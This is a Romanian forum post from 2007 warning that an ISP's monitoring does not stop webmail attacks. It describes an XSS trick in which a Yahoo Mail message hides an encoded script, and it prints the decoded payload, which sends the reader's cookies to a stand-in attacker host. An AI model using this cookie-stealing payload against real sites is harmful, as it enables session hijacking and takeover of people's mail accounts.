woody, on Sep 8 2007, 01:44 AM, said:
probleme cu virusi n-am avut niciodata... antivirusul care il folosesc nu mananca multe resurse si e poate cel mai bun pt protectie activa. Firewall nu folosesc deloc... in mare parte fiindca am internet prin retea LAN si eventualele "atacuri" interne sau externe sunt urmarite de provider.
te simti in siguranta daca eventualele "atacuri" interne sau externe sunt urmarite de provider? Cum poate provider-ul sa te ajute in cazul urmatorului exploit de iexplore 5,6,7?
exemplu:
Esti pe messenger... esti avertizat ca ai un mesaj nou in Inbox... vezi subiectul: "Salut ce faci!" si dai dublu click din curiozitate jos pe pliculetul aparut care iti deschide mail-ul la yahoo direct in inbox ramanand ca tu sa citesti noul mesaj. Ai antivirusul pornit... firewall-ul cu furculita si cutitul asteptand hrana iar la serverul din lan sunt 2 prieteni care sunt cu ochii pe evenimentele din retea.
Intrii in mesajul primit cu subiectul respectiv si constati un mesaj gol sau ceva de genul "salut ce faci... ce ai mai facut in ultimul timp?".
suspect...
Poate inchizi... poate te implici.
Dand click pe Save Message Text si analizand mesajul in notepad... constati ca acel mesaj continea :
<span id="lw_1186961214_0">">--><script>document.write(60,60,115,99,114,105,112,116,62,100,111,99, ..... multe multe cifre .... 114,105,112,116,62))</script><!--</span>
ei bine... traduci acest mesaj intr-un limbaj placut ochiului folosind un jsenv si dai peste :
<script>document.write('<img src="http://www.HOSTAREA_GASCANILOR.com/yahoo/grab.php?cookie=' + escape(document.cookie) + '&id=gaste@yahoo.com" width=0 height=0>')</script>
Realizezi rapid ca Hostarea Gascanilor reprezinta site-ul unde le vin cookie-urile victimelor care nevinovati si in siguranta cred ca citesc acest mail.
Asta e o metoda foarte usoara prin care baietii rai patrund in Inbox-urile nu numai de pe Yahoo... Ei pot citii mail-uri si eventual sterge... insa printre putinele masuri pe care le-a luat Yahoo-ul a fost sa introduca cererea de a introduce din nou parola la fiecare sectiune importanta din contul unui user.
Prin acest siretlic deci nu se pot schimba parolele si printre putinele masuri care se pot lua este sa folosim Mozilla.